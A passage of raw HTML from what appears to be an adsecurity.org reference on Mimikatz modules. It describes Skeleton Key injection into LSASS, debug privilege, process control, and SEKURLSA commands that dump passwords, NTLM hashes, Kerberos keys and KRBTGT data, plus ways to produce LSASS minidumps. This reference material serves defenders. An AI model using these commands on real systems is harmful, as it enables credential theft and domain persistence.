href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Regedit.jpg" rel="attachment wp-att-2162"><img loading="lazy" decoding="async" class="alignnone wp-image-2162" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Regedit.jpg" alt="Mimikatz-Misc-Regedit" width="642" height="209" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Regedit.jpg 1288w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Regedit-300x98.jpg 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Regedit-768x250.jpg 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Regedit-1024x333.jpg 1024w" sizes="(max-width: 642px) 100vw, 642px" /></a></p> <p><a id="MISCSkeleton"></a><a href="https://adsecurity.org/?p=1275"><b>MISC::Skeleton</b></a> &#8211; Inject Skeleton Key into LSASS process on Domain Controller.<br /> <em>Requires Administrator rights.</em><br /> This enables all user authentication to the Skeleton Key patched DC to use a &#8220;master password&#8221; (aka Skeleton Keys) as well as their usual password.<br /> <a href="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-EnableMimikatzSkeleton.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1900" src="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-EnableMimikatzSkeleton.png" alt="SneakyPersistence-EnableMimikatzSkeleton" width="642" height="283" srcset="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-EnableMimikatzSkeleton.png 642w, https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-EnableMimikatzSkeleton-300x132.png 300w" sizes="(max-width: 642px) 100vw, 642px" /></a></p> <p><b>MISC::Taskmgr</b> &#8211; Task Manager (without DisableTaskMgr).<br /> <em>Requires Administrator rights.</em><br /> <a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Taskmgr.jpg"><img loading="lazy" decoding="async" class="alignnone 
wp-image-1901" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Taskmgr.jpg" alt="Mimikatz-Misc-Taskmgr" width="516" height="409" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Taskmgr.jpg 619w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Taskmgr-300x238.jpg 300w" sizes="(max-width: 516px) 100vw, 516px" /></a></p> <p><b>MISC::Wifi &#8211;<br /> </b>No longer in MISC. Likely moved to DPAPI:Wifi which may include similar functionality.<b><br /> </b></p> <p><b>MISC::WP</b></p> <p>&nbsp;</p> <h4><b><a id="MINESWEEPER"></a>MINESWEEPER</b></h4> <p><b>MINESWEEPER::Infos</b> &#8211; Provide mine info in minesweeper</p> <p>&nbsp;</p> <h4><b><a id="Net"></a>Net</b></h4> <p><b>NET::Alias</b></p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3808" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Alias.png" alt="" width="422" height="598" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Alias.png 845w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Alias-212x300.png 212w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Alias-768x1088.png 768w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Alias-723x1024.png 723w" sizes="(max-width: 422px) 100vw, 422px" /></p> <p><b>NET::Group</b></p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3807" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Group.png" alt="" width="420" height="181" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Group.png 843w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Group-300x129.png 300w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Group-768x331.png 768w" sizes="(max-width: 420px) 100vw, 420px" /></p> <p><b>NET::ServerInfo</b></p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3806" 
src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-ServerInfo.png" alt="" width="450" height="99" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-ServerInfo.png 963w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-ServerInfo-300x66.png 300w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-ServerInfo-768x169.png 768w" sizes="(max-width: 450px) 100vw, 450px" /></p> <p><b>NET::Session</b></p> <p><b>NET::Share</b></p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3805" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Share.png" alt="" width="329" height="344" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Share.png 652w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Share-287x300.png 287w" sizes="(max-width: 329px) 100vw, 329px" /></p> <p><b>NET::Stats</b></p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3830" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Stats.png" alt="" width="500" height="40" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Stats.png 934w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Stats-300x24.png 300w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Stats-768x62.png 768w" sizes="(max-width: 500px) 100vw, 500px" /></p> <p><b>NET::TOD</b></p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3829" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-TOD.png" alt="" width="422" height="54" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-TOD.png 641w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-TOD-300x38.png 300w" sizes="(max-width: 422px) 100vw, 422px" /></p> <p><b>NET::User</b></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Net-User.jpg" rel="attachment wp-att-2694"><img loading="lazy" decoding="async" 
class="alignnone wp-image-2694" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Net-User.jpg" alt="Mimikatz-Net-User" width="332" height="281" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Net-User.jpg 465w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Net-User-300x254.jpg 300w" sizes="(max-width: 332px) 100vw, 332px" /></a></p> <p><b>NET::WSession</b></p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3828" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-WSession.png" alt="" width="261" height="117" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-WSession.png 388w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-WSession-300x135.png 300w" sizes="(max-width: 261px) 100vw, 261px" /></p> <p>&nbsp;</p> <h4><b><a id="PRIVILEGE"></a>PRIVILEGE</b></h4> <p><b>PRIVILEGE::</b><strong>Backup</strong> &#8211; get backup privilege/rights. Requires Debug rights.</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3827" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Privilege-Backup.png" alt="" width="264" height="40" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Privilege-Backup.png 443w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Privilege-Backup-300x45.png 300w" sizes="(max-width: 264px) 100vw, 264px" /></p> <p><a id="PRIVILEGEDebug"></a><b>PRIVILEGE::Debug</b> &#8211; get debug rights (this or Local System rights is required for many Mimikatz commands).<br /> By default, the Administrators group has Debug rights. Debug still has to be &#8220;activated&#8221; by running &#8220;privilege::debug&#8221;.</p> <p><em>The debug privilege allows someone to debug a process that they wouldn’t otherwise have access to. 
For example, a process running as a user with the debug privilege enabled on its token can debug a service running as local system.</em><br /> <em><a href="http://msdn.microsoft.com/library/windows/hardware/ff541528.aspx">http://msdn.microsoft.com/library/windows/hardware/ff541528.aspx</a></em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Privilege-Debug.png"><img loading="lazy" decoding="async" class="alignnone wp-image-1829" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Privilege-Debug.png" alt="Mimikatz-Privilege-Debug" width="260" height="47" /></a></p> <p><span style="text-decoration: underline;">Benjamin&#8217;s Remark:</span><br /> ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 means that the required privilege is not held by the client (mostly you&#8217;re not an administrator :smirk:)</p> <p><b>PRIVILEGE::Driver </b>&#8211; get driver privilege/rights. Requires Debug rights.</p> <p><b>PRIVILEGE::ID</b> &#8211; get privilege/rights by its ID. Requires Debug rights.</p> <p><b>PRIVILEGE::Name</b> &#8211; get privilege/rights by its name. Requires Debug rights.</p> <p><b>PRIVILEGE::Restore</b> &#8211; get restore privilege/rights. Requires Debug rights.</p> <p><b>PRIVILEGE::Security</b> &#8211; get security privilege/rights. Requires Debug rights.</p> <p><b>PRIVILEGE::SysEnv</b> &#8211; get privilege/rights to manage system environment. Requires Debug rights.</p> <p><b>PRIVILEGE::TCB</b> &#8211; get TCB privilege/rights(likely act as part of the operating system right). 
Requires elevated rights (still TBD).</p> <p>&nbsp;</p> <h4><b><a id="PROCESS"></a>PROCESS</b></h4> <p>The Mimikatz PROCESS module provides the ability to gather data on processes and interact with processes.</p> <p><b>PROCESS::Exports</b> &#8211; list exports</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Exports.jpg" rel="attachment wp-att-2167"><img loading="lazy" decoding="async" class="alignnone wp-image-2167" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Exports.jpg" alt="Mimikatz-Process-Exports" width="541" height="653" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Exports.jpg 1381w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Exports-249x300.jpg 249w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Exports-768x926.jpg 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Exports-849x1024.jpg 849w" sizes="(max-width: 541px) 100vw, 541px" /></a></p> <p><b>PROCESS::Imports</b> &#8211; list imports</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Imports.jpg" rel="attachment wp-att-2170"><img loading="lazy" decoding="async" class="alignnone wp-image-2170" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Imports.jpg" alt="Mimikatz-Process-Imports" width="417" height="599" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Imports.jpg 1163w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Imports-209x300.jpg 209w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Imports-768x1104.jpg 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Imports-712x1024.jpg 712w" sizes="(max-width: 417px) 100vw, 417px" /></a></p> <p><b>PROCESS::List</b> &#8211; List running processes<br /> Requires Administrator rights.</p> <p><a 
href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-List.jpg" rel="attachment wp-att-2169"><img loading="lazy" decoding="async" class="alignnone wp-image-2169" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-List.jpg" alt="Mimikatz-Process-List" width="292" height="590" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-List.jpg 638w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-List-148x300.jpg 148w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-List-507x1024.jpg 507w" sizes="(max-width: 292px) 100vw, 292px" /></a></p> <p><b>PROCESS::Resume</b> &#8211; resume a process</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Resume.jpg" rel="attachment wp-att-2171"><img loading="lazy" decoding="async" class="alignnone wp-image-2171" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Resume.jpg" alt="Mimikatz-Process-Resume" width="267" height="37" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Resume.jpg 469w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Resume-300x42.jpg 300w" sizes="(max-width: 267px) 100vw, 267px" /></a></p> <p><b>PROCESS::Run </b>&#8211;  Run</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3826" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Process-Run.png" alt="" width="268" height="390" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Process-Run.png 508w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Process-Run-206x300.png 206w" sizes="(max-width: 268px) 100vw, 268px" /></p> <p><b>PROCESS::Start</b> &#8211; start a process</p> <p><b>PROCESS::Stop</b> &#8211; terminate a process</p> <p><b>PROCESS::Suspend</b> &#8211; suspend a process</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Suspend.jpg" rel="attachment wp-att-2172"><img 
loading="lazy" decoding="async" class="alignnone wp-image-2172" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Suspend.jpg" alt="Mimikatz-Process-Suspend" width="289" height="35" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Suspend.jpg 495w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Suspend-300x36.jpg 300w" sizes="(max-width: 289px) 100vw, 289px" /></a></p> <p>&nbsp;</p> <h4><b><a id="RPC"></a>RPC</b></h4> <p>The RPC module provides remote control of mimikatz.</p> <p><b>RPC::Close</b></p> <p><b>RPC::Connect</b></p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3823" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Connect.png" alt="" width="280" height="255" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Connect.png 560w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Connect-300x273.png 300w" sizes="(max-width: 280px) 100vw, 280px" /></p> <p><b>RPC::Enum</b></p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3825" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Enum.png" alt="" width="574" height="707" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Enum.png 1178w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Enum-244x300.png 244w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Enum-768x946.png 768w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Enum-831x1024.png 831w" sizes="(max-width: 574px) 100vw, 574px" /></p> <p><b>RPC::Server</b></p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3824" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Server.png" alt="" width="425" height="177" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Server.png 885w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Server-300x125.png 300w, 
https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Server-768x319.png 768w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Server-720x300.png 720w" sizes="(max-width: 425px) 100vw, 425px" /></p> <p>&nbsp;</p> <h4><b><a id="SEKURLSA"></a>SEKURLSA</b></h4> <p>The SEKURLSA Mimikatz module interacts with protected memory. This module extracts passwords, keys, PIN codes, and tickets from the memory of lsass (Local Security Authority Subsystem Service).<br /> In order to interact with LSASS, the Mimikatz process requires appropriate rights:</p> <ul> <li>Administrator, to get debug privilege via <em>&#8220;PRIVILEGE::Debug&#8221; </em></li> <li>SYSTEM rights (<em>&#8220;TOKEN::elevate&#8221;)</em></li> </ul> <p>However, when running against a dumped LSASS process file (e.g. LSASS.dmp), elevated rights are not required.</p> <p><b>SEKURLSA::Backupkeys</b> &#8211; get preferred backup master keys</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-sekurlsa-Backupkeys.jpg" rel="attachment wp-att-2173"><img loading="lazy" decoding="async" class="alignnone wp-image-2173" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-sekurlsa-Backupkeys.jpg" alt="Mimikatz-sekurlsa-Backupkeys" width="394" height="75" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-sekurlsa-Backupkeys.jpg 850w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-sekurlsa-Backupkeys-300x57.jpg 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-sekurlsa-Backupkeys-768x146.jpg 768w" sizes="(max-width: 394px) 100vw, 394px" /></a></p> <p><b>SEKURLSA::Credman</b> &#8211; List Credentials Manager</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Credman.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1830" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Credman.png" alt="Mimikatz-Sekurlsa-Credman" width="474" height="560" 
srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Credman.png 474w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Credman-254x300.png 254w" sizes="(max-width: 474px) 100vw, 474px" /></a></p> <p><b>SEKURLSA::Dpapi</b> &#8211; list cached MasterKeys</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-DPAPI.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1831" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-DPAPI.png" alt="Mimikatz-Sekurlsa-DPAPI" width="478" height="554" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-DPAPI.png 478w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-DPAPI-259x300.png 259w" sizes="(max-width: 478px) 100vw, 478px" /></a></p> <p><b>SEKURLSA::DpapiSystem</b> &#8211; DPAPI_SYSTEM secret</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-DPAPISystem.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1832" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-DPAPISystem.png" alt="Mimikatz-Sekurlsa-DPAPISystem" width="631" height="57" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-DPAPISystem.png 631w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-DPAPISystem-300x27.png 300w" sizes="(max-width: 631px) 100vw, 631px" /></a></p> <p><a id="SEKURLSAEkeys"></a><b>SEKURLSA::Ekeys</b> &#8211; list Kerberos encryption keys</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-EKeys.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1833" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-EKeys.png" alt="Mimikatz-Sekurlsa-EKeys" width="752" height="677" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-EKeys.png 752w, 
https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-EKeys-300x270.png 300w" sizes="(max-width: 752px) 100vw, 752px" /></a></p> <p><a id="SEKURLSAKerberos"></a><b>SEKURLSA::Kerberos</b> &#8211; List Kerberos credentials for all authenticated users (including services and the computer account)</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Kerberos.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1834" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Kerberos.png" alt="Mimikatz-Sekurlsa-Kerberos" width="751" height="611" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Kerberos.png 751w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Kerberos-300x244.png 300w" sizes="(max-width: 751px) 100vw, 751px" /></a></p> <p><a id="SEKURLSAKrbtgt"></a><b>SEKURLSA::Krbtgt</b> &#8211; get Domain Kerberos service account (KRBTGT) password data</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-KrbTGT.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1835" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-KrbTGT.png" alt="Mimikatz-Sekurlsa-KrbTGT" width="669" height="119" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-KrbTGT.png 669w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-KrbTGT-300x53.png 300w" sizes="(max-width: 669px) 100vw, 669px" /></a></p> <p><b>SEKURLSA::LiveSSP</b> &#8211; Lists LiveSSP credentials</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-LiveSSP.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1836" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-LiveSSP.png" alt="Mimikatz-Sekurlsa-LiveSSP" width="477" height="657" 
srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-LiveSSP.png 477w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-LiveSSP-218x300.png 218w" sizes="(max-width: 477px) 100vw, 477px" /></a></p> <p><a id="SEKURLSALogonPasswords"></a><b>SEKURLSA::LogonPasswords</b> &#8211; lists all available provider credentials. This usually shows recently logged on user and computer credentials.</p> <ul> <li>Dumps password data in LSASS for currently logged on (or recently logged on) accounts as well as services running under the context of user credentials.</li> <li>Account passwords are stored in memory in a reversible manner. If they are in memory (prior to Windows 8.1/Windows Server 2012 R2 they were), they are displayed. Windows 8.1/Windows Server 2012 R2 doesn’t store the account password in this manner in most cases. KB2871997 &#8220;back-ports&#8221; this security capability to  Windows 7, Windows 8, Windows Server 2008R2, and Windows Server 2012, though the computer needs additional configuration after applying KB2871997.</li> <li>Requires administrator access (with debug rights) or Local SYSTEM rights</li> </ul> <p><span style="font-family: times new roman;"><strong style="font-size: medium;">Windows Server 2008 R2 System (Password is shown).</strong>                                                 </span></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-Sekurlsa-logonpasswords-Win10.png"><span style="font-family: times new roman;"><img loading="lazy" decoding="async" style="background-image: none; padding-top: 0px; padding-left: 0px; display: inline; padding-right: 0px; border-width: 0px;" title="Mimikatz-Sekurlsa-logonpasswords-Win2008R2-Part1" src="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-Sekurlsa-logonpasswords-Win10_thumb.png" alt="Mimikatz-Sekurlsa-logonpasswords-Win2008R2-Part1" width="572" height="851" border="0" /></span></a><span style="font-family: times new roman;">  
</span></p> <p><strong><span style="font-family: times new roman;">Windows Server 2012 R2 system – no cleartext password shown</span></strong></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-Sekurlsa-logonpasswords-Win2012R21.png"><span style="font-family: times new roman;"><img loading="lazy" decoding="async" class="" style="background-image: none; padding-top: 0px; padding-left: 0px; display: inline; padding-right: 0px; border-width: 0px;" title="Mimikatz-Sekurlsa-logonpasswords-Win2012R2" src="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-Sekurlsa-logonpasswords-Win2012R2_thumb1.png" alt="Mimikatz-Sekurlsa-logonpasswords-Win2012R2" width="569" height="692" border="0" /></span></a></p> <p><span style="font-family: times new roman;">Services running with account credentials are also dumped using this command.<br /> Note that only services that are running (credentials in memory) can be dumped in this manner.<br /> </span></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/01/WindowsServer2008R2-SQLServices.png"><span style="font-family: times new roman;"><img loading="lazy" decoding="async" style="background-image: none; padding-top: 0px; padding-left: 0px; display: inline; padding-right: 0px; border-width: 0px;" title="WindowsServer2008R2-SQLServices" src="https://adsecurity.org/wp-content/uploads/2015/01/WindowsServer2008R2-SQLServices_thumb.png" alt="WindowsServer2008R2-SQLServices" width="848" height="296" border="0" /></span></a></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-Sekurlsa-logonpasswords-Win2008R2-ServicePasswordDump-Part22.png"><span style="font-family: times new roman;"><img loading="lazy" decoding="async" class="" style="background-image: none; padding-top: 0px; padding-left: 0px; display: inline; padding-right: 0px; border-width: 0px;" title="Mimikatz-Sekurlsa-logonpasswords-Win2008R2-ServicePasswordDump-Part2" 
src="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-Sekurlsa-logonpasswords-Win2008R2-ServicePasswordDump-Part2_thumb2.png" alt="Mimikatz-Sekurlsa-logonpasswords-Win2008R2-ServicePasswordDump-Part2" width="515" height="298" border="0" /></span></a></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-Sekurlsa-logonpasswords-Win2008R2-ServicePasswordDump-Part32.png"><span style="font-family: times new roman;"><img loading="lazy" decoding="async" class="" style="background-image: none; padding-top: 0px; padding-left: 0px; display: inline; padding-right: 0px; border-width: 0px;" title="Mimikatz-Sekurlsa-logonpasswords-Win2008R2-ServicePasswordDump-Part3" src="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-Sekurlsa-logonpasswords-Win2008R2-ServicePasswordDump-Part3_thumb2.png" alt="Mimikatz-Sekurlsa-logonpasswords-Win2008R2-ServicePasswordDump-Part3" width="519" height="295" border="0" /></span></a></p> <p>&nbsp;</p> <p><b>SEKURLSA::Minidump</b> &#8211; switch to LSASS minidump process context</p> <p>There are several different ways to dump LSASS: <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/procdump">procdump</a>, <a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1">PowerShell</a>, Task Manager, etc.</p> <p>Note that minidumps need to be read on the same platform they were dumped from: NT5 Win32, NT5 x64, NT6 Win32, or NT6 x64.<br /> <a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Minidump.png"><img loading="lazy" decoding="async" class="alignnone wp-image-1838" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Minidump.png" alt="Mimikatz-Sekurlsa-Minidump" width="449" height="207" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Minidump.png 829w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Minidump-300x138.png 300w" sizes="(max-width: 449px) 100vw, 
449px" /></a></p> <p>Another option is to dump the LSASS process with Task Manager</p> <p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-3835" src="https://adsecurity.org/wp-content/uploads/2017/11/Dump-LSASS-With-TaskManager.png" alt="" width="400" height="444" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Dump-LSASS-With-TaskManager.png 400w, https://adsecurity.org/wp-content/uploads/2017/11/Dump-LSASS-With-TaskManager-270x300.png 270w" sizes="(max-width: 400px) 100vw, 400px" /></p> <p>Sekurlsa::minidump can open the dump file.</p> <p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-3837" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-sekurlsa-minidump-02.png" alt="" width="509" height="235" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-sekurlsa-minidump-02.png 509w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-sekurlsa-minidump-02-300x139.png 300w" sizes="(max-width: 509px) 100vw, 509px" /> <img loading="lazy" decoding="async" class="alignnone size-full wp-image-3836" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-sekurlsa-minidump-01.png" alt="" width="521" height="318" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-sekurlsa-minidump-01.png 521w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-sekurlsa-minidump-01-300x183.png 300w" sizes="(max-width: 521px) 100vw, 521px" /></p> <p>&nbsp;</p> <p><b>SEKURLSA::MSV</b> &#8211; List LM &amp; NTLM credentials</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-MSV.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1839" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-MSV.png" alt="Mimikatz-Sekurlsa-MSV" width="473" height="674" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-MSV.png 473w, 
